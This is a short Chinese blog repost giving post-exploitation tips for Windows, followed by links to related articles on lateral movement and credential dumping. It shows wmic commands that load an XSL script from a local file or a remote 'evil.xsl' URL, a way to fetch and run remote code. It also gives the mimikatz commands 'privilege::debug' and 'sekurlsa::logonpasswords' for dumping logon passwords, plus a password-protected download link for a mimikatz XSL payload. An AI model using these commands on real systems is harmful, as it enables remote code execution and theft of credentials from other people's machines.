wmic与mimikatz技巧

最新推荐文章于 2024-05-17 15:33:57 发布

weixin_30487701

最新推荐文章于 2024-05-17 15:33:57 发布

阅读量138

点赞数

文章标签： php

原文链接：http://www.cnblogs.com/s0mf/p/9200974.html

版权

前言

wmic是比cmd强大的命令行。轻量级调试器神器mimikatz，后渗透常用。

测试wmic

使用wmic能够从本地或从URL调用XSL（可扩展样式表语言）脚本。

本地：
wmic process list /FORMAT:evil.xsl
远程：
wmic os get /FORMAT:"https://example.com/evil.xsl"

本地：

命令：

privilege::debug
sekurlsa::logonpasswords

密码账号：

远程：

PowerShell

项目： https://github.com/caseysmithrc/XSLIdeas

总结：

emmmm，多关注墙外的知识。

mimikatz.xsl :

链接：https://pan.baidu.com/s/1rA5X4yQXprOME4cV-0TCaA 密码：4vcb

参考:

https://www.secpulse.com/archives/71380.html
https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1

转载于:https://www.cnblogs.com/s0mf/p/9200974.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30487701

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Mimikatz获取系统密码攻防研究

weixin_44023460的博客

06-23

4548

Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试，可以说是渗透必备工具，从早期1.0版本到现在的2.1.1 20180205版本，其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件（mimilib.dll、mimikatz.exe、mimidrv.sys），分为Win32位（多了一个mimilove.exe文件）和X64位。通过它们可以提升进程权限、注

内网横向移动思路和技巧

11-30

2万+

攻击者借助跳板机进一步入侵内网服务器后，接着会通过各种方式来获取目标系统权限，获取用户的明文密码或Hash值在内网中横向移动。最简单的方式，就是使用明文密码进行登录远程服务器。在这里，我...

参与评论您还未登录，请先登录后发表或查看评论

域渗透之wmi协议进行密码或hash传递

最新发布

qq_55202378的博客

05-17

298

wmi服务是比smb服务更高级一些的，在日志中是找不到痕迹的，但是这个主要是传递管理员的用户凭据。

域横向移动 -基于smb&wmi 明文或 hash 传递

mingyqf的博客

11-10

834

内网域横向 smb&wmi 明文或 hash 传递演示案例：  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash  域横向移动 SMB 服务利用-psexec,smbexec  域横向移动 WMI 服务利用-cscript,wmiexec,wmic  域横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz

【内网安全-横向移动】WMI-WMIC命令&相关内网工具

02-08

9061

【横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER

内网安全-域横向smb&wmi明文或hash传递

xhscxj的博客

03-11

3838

知识点1： Windows2012以上版本默认关闭wdigest，攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁，同样也会导致无法获取明文密码针对以上情况，我们提供了4种方式解决此类问题 1.利用哈希hash传递（path，ptk等）进行移动 2.利用其他服务协议（SMB，WMI等）进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台（Hachcat）进行破解获取 ...

mimikatz使用笔记

weixin_30273501的博客

10-02

976

一、获取密码# privilege::debug sekurlsa::logonpasswords mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit 　　一般我会使用bat @echo offmimikatz.exe privilege::debug...

渗透测试工具实战技巧合集

Sylon的博客

06-26

1856

渗透测试工具实战技巧合集本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分，译者将其合二为一，方便大家查阅。原文出自https://www.freebuf.com/sectool/105524.html来自FreeBuf黑客与极客（FreeBuf.COM）最好的 NMAP 扫描策略 # 适用所有大小网络最好的 ...

内网渗透工具与流程.pptx

04-10

利用`wmic product get name,version`列出已安装的软件，可能发现未打补丁或易受攻击的应用程序。对于远程连接的检测，可以通过注册表查询RDP连接的端口号，如`reg query "HKEY_LOCAL_MACHINE\SYSTEM\...

红队小技巧

weixin_43570648的博客

07-12

685

原文链接：（我直接粘贴过来没有图片） https://xz.aliyun.com/t/9773 前言有一段时间没有写文章了，也不知写什么，毕竟从攻击方换成防守方，乙方换到甲方，还有些许不适应。。。但还是决定把自己接触渗透所积累的东西也拿出分享，不管糟粕，还是大伙觉得我分享的有用（那阿鑫自然是很开心），希望能帮到还在学习路上的朋友，文章若有错误，请及时联系我指出，我也不想误导才学习的朋友。此外，本文为口嗨文，基本在说思路，没有实操。 web端 (1)信息收集收集cms信息： 1.通过云溪，wapplayz

如何通过破解hash来获取管理员密码

12-28

如何通过破解hash来获取管理员密码. 高手勿进。

比CMD更强大的命令行：WMIC后渗透利用（系统命令）

热门推荐

discover2210212455的博客

09-15

5万+

写在前面的话在这篇文章中，我们将讨论如何在攻击的后渗透利用阶段使用WMIC（Windows Management InstrumentationCommand Line）。当攻击者在远程PC上拿到meterpreter会话之后，他们就可以枚举大量的系统信息，并利用WMI命令行工具来进行更深程度的操作。首先，我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后，我们还会告诉大...

【内网渗透】域横向smb&wmi明文或hash传递

ssrf

03-07

1484

目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1）hashcat暴力破解2）注册表操作开启Wdigest Auth值3）SMB服务协议进行哈希移动4）WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件，直接上传到目标主机可能被杀毒软件查杀，这时我们可以配合官方软件Procdump，将Procdump上传目标主机获取用户信息(该文件不可读)，使用本地

一些wmic例子

origin 专栏

06-01

278

[size=medium]BIOS - 基本输入/输出服务 (BIOS) 管理 ::查看bios版本型号 wmic bios get Manufacturer,Name COMPUTERSYSTEM - 计算机系统管理 ::查看系统启动选项,boot的内容 wmic COMPUTERSYSTEM get SystemStartupOptions ::查看工作组/域 wmic ...

中了挖矿病毒

weixin_38946164的博客

06-17

2005

最近一台服务器运行超级慢，任务管理器查看CPU占用100% ，使用autoruns.exe工具查看到异常任务和进程。打开文件路径还发现以下文件，config.json , c3a.bat , wina.exe config.json 代码如下： { "api": { "id": null, "worker-id": null }, "http": { "enabled": true, "host": "127

mimikatz的使用

谢公子的博客

07-26

3623

mimikatz mimikatz是法国人Gentil Kiwi 编写的一款 Windows 平台下的神器，它具备很多功能，其中最主要的功能是直接从lsass.exe进程里获取处于 active 状态账号的明文密码。mimikatz的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等等，mimikatz包含了很多本地模块，更像是一个轻量级的调试器。作者主页：http://blog....

Windows WMIC命令详解 (Windows Management Instrumentation Command-line)

无与伦比BLOG

09-10

1871

Windows WMIC命令详解【例】将当前系统BIOS，CPU，主板等信息输出到一个HTML网页文件，命令如下：：：得到系统信息.bat，运行bat文件即可 ::系统信息输出到HTML文件,查看帮助： wmic /? ::wmic [系统参数名] list [brief|full] /format:hform >|>> [文件名] wmic bios

内网渗透总结三：第三步利用明文或者hash进行横向移动

yggcwhat

05-06

1253

内网渗透总结三：第三步利用明文或者hash进行横向移动

DOS下wmic实用命令实例与环境变量管理

5. 创建和删除环境变量与目录：`wmic ENVIRONMENT createname` 用于创建新的环境变量，如创建名为"home"的变量，`wmic FSDIR` 则可以列出或删除文件系统目录，如删除"E:\test"目录。这些命令展示了WMIC的强大功能...